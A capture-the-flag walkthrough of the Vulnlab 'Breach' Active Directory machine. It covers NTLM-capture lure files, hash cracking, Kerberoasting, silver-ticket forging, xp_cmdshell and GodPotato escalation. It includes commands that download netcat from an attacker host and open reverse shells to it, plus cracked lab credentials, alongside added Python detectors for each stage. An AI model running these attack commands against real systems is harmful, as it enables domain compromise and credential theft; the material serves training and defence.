In this walkthrough, we will be going through the Breach room from Vulnlab. This room is rated as Medium on the platform, and it consists of capturing a user's NTLM hash by placing documents that a domain user is likely to open in an SMB share. Using the captured credentials, Kerberoasting is performed to get the password of the svc_mssql user. After that, a Silver Ticket attack has to be executed against MSSQL in order to get initial access. For privilege escalation, SeImpersonatePrivilege needs to be abused via the GodPotato exploit to get root on the target. So, let's get started without any delay.
Machine Info:
| Title | Breach |
| --- | --- |
| IP address | 10.10.95.5 |
| Difficulty | Medium |
| OS | Windows |
| Description | Breach is a Medium Windows machine that requires capturing a user's NTLM hash by placing documents that a domain user is likely to open in an SMB share. Using the captured credentials, Kerberoasting is performed to get the password of the svc_mssql user. After that, a Silver Ticket attack has to be executed against MSSQL in order to get initial access. For privilege escalation, SeImpersonatePrivilege needs to be abused via the GodPotato exploit to get root on the target. |
Enumeration:
- I started off with a regular nmap scan, followed by an all-TCP-port scan and a UDP scan. Found multiple open ports: 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.
$ sudo nmap -sV -sC 10.10.95.5
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 12:26 IST
Nmap scan report for 10.10.95.5
Host is up (0.18s latency).
Not shown: 987 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-22 06:56:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|_  Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-22T06:52:26
|_Not valid after:  2054-04-22T06:52:26
|_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-22T06:56:48+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2024-04-21T06:51:40
|_Not valid after:  2024-10-21T06:51:40
|_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time.
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info:
|   10.10.95.5:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-04-22T06:56:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.85 seconds
sudo nmap -p- -T5 10.10.95.5
PORT      STATE SERVICE
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
60843/tcp open  unknown
61065/tcp open  unknown
62932/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 391.54 seconds
sudo nmap -sU -T4 10.10.95.5
PORT    STATE SERVICE
123/udp open  ntp
389/udp open  ldap
Nmap done: 1 IP address (1 host up) scanned in 141.03 seconds
- Added hostname to my /etc/hosts file.
PORT 80
- The running webserver has a default IIS Page. Nothing fancy!
- Fired gobuster at the target but found no directories.
$ gobuster dir -u http://10.10.95.5/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.95.5/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
2024/04/22 12:42:49 Starting gobuster in directory enumeration mode
===============================================================
===============================================================
2024/04/22 13:00:41 Finished
===============================================================
PORT 135
- Tried to enumerate usernames using rpcclient but got nothing.
PORT 139/445
- Tried to list the shares using an SMB null session and found two interesting ones: share and Users.
smbclient -L 10.10.95.5
- Next, I tried to peek into the "share" share and found 3 potential users of the domain.
$ smbclient //10.10.95.5/share
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 17 19:41:08 2022
  ..                                DHS        0  Thu Feb 17 21:08:00 2022
  finance                             D        0  Thu Feb 17 16:49:34 2022
  software                            D        0  Thu Feb 17 16:49:12 2022
  transfer                            D        0  Thu Feb 17 19:30:35 2022

                7863807 blocks of size 4096. 2613329 blocks available
smb: \> cd finance
smb: \finance\> ls
  .                                   D        0  Thu Feb 17 16:49:34 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022

                7863807 blocks of size 4096. 2615078 blocks available
smb: \finance\> cd ..
smb: \> cd software
smb: \software\> ls
  .                                   D        0  Thu Feb 17 16:49:12 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022

                7863807 blocks of size 4096. 2615616 blocks available
smb: \software\> cd ..
smb: \> cd transfer
smb: \transfer\> ls
  .                                   D        0  Thu Feb 17 19:30:35 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022
  claire.pope                         D        0  Thu Feb 17 16:51:35 2022
  diana.pope                          D        0  Thu Feb 17 16:51:19 2022
  julia.wong                          D        0  Thu Feb 17 16:54:39 2022

                7863807 blocks of size 4096. 2615794 blocks available
smb: \transfer\> cd claire.pope\
smb: \transfer\claire.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*
smb: \transfer\claire.pope\> cd ..
smb: \transfer\> cd diana.pope\
smb: \transfer\diana.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*
smb: \transfer\diana.pope\> cd ..
smb: \transfer\> cd julia.wong\
smb: \transfer\julia.wong\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\*
smb: \transfer\julia.wong\> exit
- Looked into the Users share too; found nothing but a bunch of VM files.
$ smbclient //10.10.95.5/Users
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Feb 17 18:42:16 2022
  ..                                DHS        0  Thu Feb 17 21:08:00 2022
  Default                           DHR        0  Thu Feb 10 14:40:33 2022
  desktop.ini                       AHS      174  Sat May  8 13:48:31 2021
  Public                             DR        0  Wed Sep 15 08:38:59 2021

                7863807 blocks of size 4096. 2832661 blocks available
smb: \> cd Default\
smb: \Default\> ls
  .                                 DHR        0  Thu Feb 10 14:40:33 2022
  ..                                 DR        0  Thu Feb 17 18:42:16 2022
  AppData                            DH        0  Thu Aug 19 12:15:22 2021
  Desktop                            DR        0  Thu Aug 19 11:54:36 2021
  Documents                          DR        0  Thu Feb 10 06:29:34 2022
  Downloads                          DR        0  Sat May  8 13:50:24 2021
  Favorites                          DR        0  Sat May  8 13:50:24 2021
  Links                              DR        0  Sat May  8 13:50:24 2021
  Music                              DR        0  Sat May  8 13:50:24 2021
  NTUSER.DAT                        AHn   524288  Thu Feb 17 21:08:01 2022
  ntuser.ini                       AHSn       20  Thu Aug 19 12:15:22 2021
  Pictures                           DR        0  Sat May  8 13:50:24 2021
  Saved Games                        Dn        0  Sat May  8 13:50:24 2021
  Videos                             DR        0  Sat May  8 13:50:24 2021

                7863807 blocks of size 4096. 2829523 blocks available
smb: \Default\> cd Desktop
smb: \Default\Desktop\> ls
  .                                  DR        0  Thu Aug 19 11:54:36 2021
  ..                                DHR        0  Thu Feb 10 14:40:33 2022
  EC2 Feedback.website                A      527  Tue Jun 21 21:06:17 2016
  EC2 Microsoft Windows Guide.website A      554  Tue Jun 21 21:06:23 2016

smb: \Default\Desktop\> get "EC2 Feedback.website"
getting file \Default\Desktop\EC2 Feedback.website of size 527 as EC2 Feedback.website (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \Default\Desktop\> get "EC2 Microsoft Windows Guide.website"
getting file \Default\Desktop\EC2 Microsoft Windows Guide.website of size 554 as EC2 Microsoft Windows Guide.website (0.8 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \Default\Desktop\> cd ..
smb: \Default\> ls
  .                                 DHR        0  Thu Feb 10 14:40:33 2022
  ..                                 DR        0  Thu Feb 17 18:42:16 2022
  AppData                            DH        0  Thu Aug 19 12:15:22 2021
  Desktop                            DR        0  Thu Aug 19 11:54:36 2021
  Documents                          DR        0  Thu Feb 10 06:29:34 2022
  Downloads                          DR        0  Sat May  8 13:50:24 2021
  Favorites                          DR        0  Sat May  8 13:50:24 2021
  Links                              DR        0  Sat May  8 13:50:24 2021
  Music                              DR        0  Sat May  8 13:50:24 2021
  NTUSER.DAT                        AHn   524288  Thu Feb 17 21:08:01 2022
  ntuser.ini                       AHSn       20  Thu Aug 19 12:15:22 2021
  Pictures                           DR        0  Sat May  8 13:50:24 2021
  Saved Games                        Dn        0  Sat May  8 13:50:24 2021
  Videos                             DR        0  Sat May  8 13:50:24 2021
smb: \Default\> get NTUSER.DAT
getting file \Default\NTUSER.DAT of size 524288 as NTUSER.DAT (352.9 KiloBytes/sec) (average 168.0 KiloBytes/sec)
smb: \> exit
- Next, I sprayed the usernames I had, passing the same list as the crackmapexec password parameter, to check whether any user has their username as their password, but had no luck.
crackmapexec smb 10.10.95.5 -u usernames.txt -p usernames.txt --continue-on-success
AS-REP Roasting
- For the found usernames, I tried AS-REP roasting to check whether any of them have Kerberos pre-authentication disabled, but had no luck.
python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.95.5 breach.vl/
PORT 389 (LDAP)
- Next, I tried my luck with LDAP using null authentication but got nothing back.
Exploitation:
- I tested whether I could put a file on the "share" share and was able to do so. So, I generated a bunch of files with the ntlm_theft script: if a domain user opens one of the generated files, I will be able to capture their NTLM hash with Responder.
python3 ntlm_theft.py --generate all --server 10.8.2.6 --filename breach
- I put my files in each folder of the share. After a couple of minutes, I got a hit on my Responder listener: the NetNTLMv2 hash of user Julia.Wong.
sudo python3 Responder.py -I tun0
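The defender's counterpart to the lure-file step above: an added example (not code from the walkthrough or from ntlm_theft) that scans a share for the small shortcut-style files such tools drop and reports any that reference a host outside an allow-list of known file servers. The share layout, file contents, host names and function names are constructed for the demo.

```python
"""Scan a share (mounted or copied locally) for NTLM-capture lure files.

Added defensive example, not code from the original walkthrough. Lure files of
the kind ntlm_theft drops are tiny and carry a UNC or URL path to the listener;
any such file that points outside the allow-listed file servers is reported.
The directory layout, file contents and hosts below are constructed.
"""
import os
import re
import tempfile

# File types Explorer/Office dereference on open or even on listing (partial list)
LURE_EXTENSIONS = {".scf", ".url", ".lnk", ".library-ms", ".rtf", ".htm", ".html", ".xml"}
# \\host\... , //host/... or scheme://host/... ; host may be an IP or a name
HOST_RE = re.compile(r"(?:\\\\|//)([A-Za-z0-9_.-]+)[\\/]")

def referenced_hosts(path):
    """Return every remote host a file points at (ASCII and UTF-16LE scan)."""
    with open(path, "rb") as fh:
        raw = fh.read(64 * 1024)  # lure files are tiny; cap the read
    text = raw.decode("latin-1") + raw.decode("utf-16-le", "ignore")  # .lnk stores UTF-16
    return {m.group(1).lower() for m in HOST_RE.finditer(text)}

def scan_share(root, allowed_hosts):
    """Return sorted (relative_path, host) pairs referencing a host not on the allow-list."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in LURE_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.extend((rel, host) for host in referenced_hosts(full) - allowed)
    return sorted(findings)

def build_sample_share():
    """Constructed share: a benign shortcut to the real file server and one lure file."""
    root = tempfile.mkdtemp(prefix="share_")
    os.makedirs(os.path.join(root, "transfer"))
    with open(os.path.join(root, "readme.url"), "w") as fh:  # benign, internal server
        fh.write("[InternetShortcut]\nURL=file://fileserver.corp.local/docs/readme.txt\n")
    with open(os.path.join(root, "transfer", "breach.scf"), "w") as fh:  # lure
        fh.write("[Shell]\nCommand=2\nIconFile=\\\\10.8.2.6\\share\\breach.ico\n")
    return root

if __name__ == "__main__":
    for rel, host in scan_share(build_sample_share(), {"fileserver.corp.local"}):
        print(f"ALERT: {rel} references {host}")
```

Run it periodically against writable shares, or pair it with the share ACL review that would have prevented the write in the first place.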
- Cracked the hash using hashcat and got the password of user Julia.Wong.
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -O
Julia.Wong: Computer1
- Logged into her share and got the user flag.
smbclient //10.10.95.5/share -U julia.wong --password=Computer1
cd transfer/julia.wong
get local.txt
Kerberoasting
- After getting the flag, I wasn't able to get a shell as user julia.wong, so I enumerated other users on the domain. Found a list of them as per the result below. The interesting one among them was the svc_mssql account; we already know from the nmap scan that MSSQL is running on the target.
crackmapexec smb 10.10.95.5 -u julia.wong -p Computer1 --users
- Next, performed Kerberoasting and got the hash for the svc_mssql SPN. Cracked it with hashcat and got the password.
python3 ~/Tools/impacket/examples/GetUserSPNs.py breach.vl/julia.wong:Computer1 -dc-ip 10.10.95.5 -request
hashcat -m 13100 sql_svc.hash /usr/share/wordlists/rockyou.txt -O
svc_mssql: Trustno1
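What the Kerberoasting step above looks like from the domain controller's side, as an added example that is not part of the walkthrough: event 4769 records a service-ticket request, and GetUserSPNs-style requests stand out as RC4 (encryption type 0x17) tickets for user-owned SPNs, several of them from one requester in a short window. The event records, account names and function names below are constructed.

```python
"""Flag Kerberoasting-style service-ticket requests in Security event 4769 data.

Added defensive example, not code from the original walkthrough. Two signals
are combined: a ticket issued with RC4-HMAC (TicketEncryptionType 0x17) for a
user-owned SPN (ServiceName without a trailing '$'), and one requester pulling
such tickets for several distinct services inside a short window. The records
below are constructed from the 4769 fields TargetUserName, ServiceName,
TicketEncryptionType and IpAddress.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # AES tickets are 0x11/0x12; RC4 keys derive from the NT hash and crack offline

EVENTS = [  # constructed 4769 records
    {"time": "2024-04-22T07:10:01", "account": "julia.wong@BREACH.VL", "service": "svc_mssql",
     "etype": "0x17", "ip": "10.8.2.6"},
    {"time": "2024-04-22T07:10:02", "account": "julia.wong@BREACH.VL", "service": "svc_backup",
     "etype": "0x17", "ip": "10.8.2.6"},
    {"time": "2024-04-22T07:10:02", "account": "julia.wong@BREACH.VL", "service": "BREACHDC$",
     "etype": "0x12", "ip": "10.8.2.6"},
    {"time": "2024-04-22T08:30:00", "account": "claire.pope@BREACH.VL", "service": "svc_mssql",
     "etype": "0x17", "ip": "10.10.95.20"},
]

def is_roastable_request(ev):
    """True for an RC4 ticket to a user account's SPN (machine accounts and krbtgt excluded)."""
    svc = ev["service"]
    return ev["etype"].lower() == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt"

def find_kerberoasting(events, window=timedelta(minutes=5), min_services=2):
    """Map (account, ip) -> sorted services for requesters that hit the threshold in one window."""
    by_requester = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_requester[(ev["account"], ev["ip"])].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))
    hits = {}
    for key, reqs in by_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide the window over each request
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                hits[key] = sorted(services)
                break
    return hits

if __name__ == "__main__":
    for (account, ip), services in find_kerberoasting(EVENTS).items():
        print(f"possible Kerberoasting by {account} from {ip}: {', '.join(services)}")
```

claire.pope's single RC4 request stays below the threshold; once the domain enforces AES-only keys on service accounts, any remaining RC4 request is itself worth an alert, so min_services can drop to 1.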
Silver Ticket Attack
- I was still not able to get shell access on the target with the svc_mssql creds. Tried to access MSSQL with mssqlclient but got only a limited shell. So, I tried to perform a Silver Ticket attack.
A Silver Ticket attack is when an attacker forges a Kerberos service ticket for a specific service in Microsoft's Active Directory, using that service account's secret (here its NTLM hash), which grants access to that service without going through the KDC and without the user's legitimate credentials. It is a type of cyber-attack that abuses the way the Kerberos protocol trusts tickets encrypted with the service key.
In order to create a Silver Ticket for a service, we need three things:
- Domain SID
- NTLM hash of the service account (here svc_mssql)
- SPN name
- To find the domain SID, I used impacket's lookupsid script with Julia Wong's creds.
python3 ~/Tools/impacket/examples/lookupsid.py breach.vl/Julia.Wong:Computer1@10.10.95.5
- Used the online utility below to generate the NTLM hash of the svc_mssql password.
NTLM Hash Generator: https://codebeautify.org/ntlm-hash-generator (the NTLM hash is just MD4 over the UTF-16LE encoding of the password, so it can equally be computed locally rather than sending a credential to a third-party site)
- Finally, created the silver ticket using impacket's ticketer script, specifying the privileges of the Administrator (user ID 500).
impacket.ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator
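Detecting the forged ticket described in the two passages above, as an added example that is not code from the walkthrough or from impacket: because a silver ticket is built offline from the service account's key, the KDC never issues it, so a Kerberos logon on the service host that no domain controller's 4769 can account for is the tell. The event records, RIDs and function names below are constructed; the domain SID is the one the walkthrough recovered, and the 10-hour lookback is the default maximum service-ticket lifetime.

```python
"""Spot forged service tickets by correlating host logons with DC ticket issuance.

Added defensive example, not code from the original walkthrough. A silver
ticket is built offline from the service account's key and never touches the
KDC, so the service host records a Kerberos network logon (event 4624,
LogonType 3, AuthenticationPackageName=Kerberos) for which no domain
controller logged a matching service-ticket request (event 4769) for that
user, client address and service within the ticket lifetime. All records
below are constructed; the domain SID is the one from the walkthrough.
"""
from datetime import datetime, timedelta

DOMAIN_SID = "S-1-5-21-2330692793-3312915120-706255856"
DC_4769 = [  # (time, TargetUserName, IpAddress, ServiceName) as seen on the DC
    ("2024-04-22T07:10:01", "julia.wong", "10.8.2.6", "svc_mssql"),
    ("2024-04-22T09:00:00", "diana.pope", "10.10.95.20", "svc_mssql"),
]
SQLHOST_4624 = [  # network logons on the SQL host; 'sid' is TargetUserSid
    {"time": "2024-04-22T09:00:05", "user": "diana.pope", "sid": DOMAIN_SID + "-1105",
     "ip": "10.10.95.20", "pkg": "Kerberos"},
    {"time": "2024-04-22T09:20:00", "user": "Administrator", "sid": DOMAIN_SID + "-500",
     "ip": "10.8.2.6", "pkg": "Kerberos"},
    {"time": "2024-04-22T09:25:00", "user": "svc_backup", "sid": DOMAIN_SID + "-1110",
     "ip": "10.10.95.30", "pkg": "NTLM"},  # NTLM logons are out of scope here
]

def find_unbacked_kerberos_logons(logons, tgs_requests, service, lifetime=timedelta(hours=10)):
    """Return (time, user, ip, reason) for Kerberos logons with no 4769 in the preceding lifetime."""
    issued = [(datetime.fromisoformat(t), u.lower(), ip, svc) for t, u, ip, svc in tgs_requests]
    suspicious = []
    for lg in logons:
        if lg["pkg"] != "Kerberos":
            continue
        t_logon = datetime.fromisoformat(lg["time"])
        backed = any(u == lg["user"].lower() and ip == lg["ip"] and svc == service
                     and timedelta(0) <= t_logon - t <= lifetime
                     for t, u, ip, svc in issued)
        if backed:
            continue
        reason = "Kerberos logon with no matching 4769 on any DC"
        if lg["sid"].endswith("-500"):  # ticketer's '-user-id 500' forges the built-in admin
            reason += "; PAC claims the built-in Administrator (RID 500)"
        suspicious.append((lg["time"], lg["user"], lg["ip"], reason))
    return suspicious

if __name__ == "__main__":
    for hit in find_unbacked_kerberos_logons(SQLHOST_4624, DC_4769, "svc_mssql"):
        print("ALERT:", *hit)
```

In production the 4769 side must be aggregated from every DC, and a legitimate client may reuse a cached ticket, so the lookback has to cover the full ticket lifetime rather than a few minutes.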
Getting a shell
- Now, I used the generated ticket to log into the MSSQL server, enabled xp_cmdshell, downloaded a netcat binary to the target and executed it to get a reverse shell.
export KRB5CCNAME=Administrator.ccache
impacket.mssqlclient -k -no-pass breach.vl -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
EXECUTE xp_cmdshell 'mkdir C:\Temp';
EXECUTE xp_cmdshell 'powershell.exe iwr -uri http://10.8.2.6:8000/nc.exe -Outfile C:\Temp\nc.exe';
EXECUTE xp_cmdshell 'C:\Temp\nc.exe 10.8.2.6 4444 -e cmd.exe';
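The sp_configure sequence above leaves a trace in the SQL Server error log, and the following added example (not code from the walkthrough) parses those lines to alert on it. The ERRORLOG excerpt, spid values and function names are constructed; the message wording follows SQL Server's configuration-change message 15457 and the informational line logged on first use of an xpstar.dll procedure.

```python
"""Detect xp_cmdshell being switched on by parsing SQL Server ERRORLOG lines.

Added defensive example, not code from the original walkthrough. Every
sp_configure change is written to the error log as message 15457
("Configuration option '...' changed from X to Y"); the enable sequence is
'show advanced options' 0->1 followed by 'xp_cmdshell' 0->1 from the same
session (spid), and the first call of the procedure logs an informational
line naming xpstar.dll. The ERRORLOG excerpt below is constructed.
"""
import re
from datetime import datetime, timedelta

CONFIG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\.")
FIRST_USE_RE = re.compile(r"^\S+ \S+\s+(?P<spid>spid\d+)\s+Using 'xpstar\.dll'.*"
                          r"extended stored procedure '(?P<proc>\w+)'")
# Options that hand an SQL login a code-execution path once enabled
DANGEROUS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled", "Ad Hoc Distributed Queries"}

ERRORLOG = """\
2024-04-22 09:20:58.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-04-22 09:20:59.42 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-04-22 09:21:10.00 spid51      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2024-04-22 11:02:03.77 spid67      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
"""

def detect_cmdshell_enable(log_text, pair_window=timedelta(seconds=60)):
    """Return (kind, spid, name) alerts: 'config' for a dangerous option turned on, 'sequence'
    when 'show advanced options' preceded it from the same spid, 'first_use' for xp_cmdshell."""
    alerts, advanced_on = [], {}  # spid -> time 'show advanced options' went to 1
    for line in log_text.splitlines():
        m = CONFIG_RE.match(line)
        if m:
            ts, spid, opt = datetime.fromisoformat(m["ts"]), m["spid"], m["opt"]
            if opt == "show advanced options" and m["new"] == "1":
                advanced_on[spid] = ts
            elif opt in DANGEROUS and m["new"] != "0":
                alerts.append(("config", spid, opt))
                if spid in advanced_on and ts - advanced_on[spid] <= pair_window:
                    alerts.append(("sequence", spid, opt))
            continue
        u = FIRST_USE_RE.match(line)
        if u and u["proc"] == "xp_cmdshell":
            alerts.append(("first_use", u["spid"], u["proc"]))
    return alerts

if __name__ == "__main__":
    for kind, spid, name in detect_cmdshell_enable(ERRORLOG):
        print(f"[{kind}] {spid}: {name}")
```

The same lines reach the Windows Application log under the MSSQLSERVER source, so a SIEM rule on message 15457 with option name xp_cmdshell works without reading the file directly.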
Privilege Escalation:
- Once I landed a shell on the target, I looked into the privileges assigned to the user and found SeImpersonatePrivilege enabled. So, I went directly for the Potato exploits.
whoami /all
- Used the GodPotato exploit on the target to get a shell as NT AUTHORITY\SYSTEM.
GodPotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 10.8.2.6 5555"
Conclusion:
So that was "Breach" for you. We started off with a regular nmap scan and found multiple open ports: 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more. Next, we created some documents using ntlm_theft.py and placed them in an SMB share, which eventually helped us capture the hash of user Julia.Wong. We cracked the hash and performed Kerberoasting to get the password of the svc_mssql user. Next, we performed a Silver Ticket attack to get initial access on the target. For privilege escalation, SeImpersonatePrivilege was abused via the GodPotato exploit to get root on the target. On that note, I'll take your leave and meet you in the next one. Till then, "Happy hacking".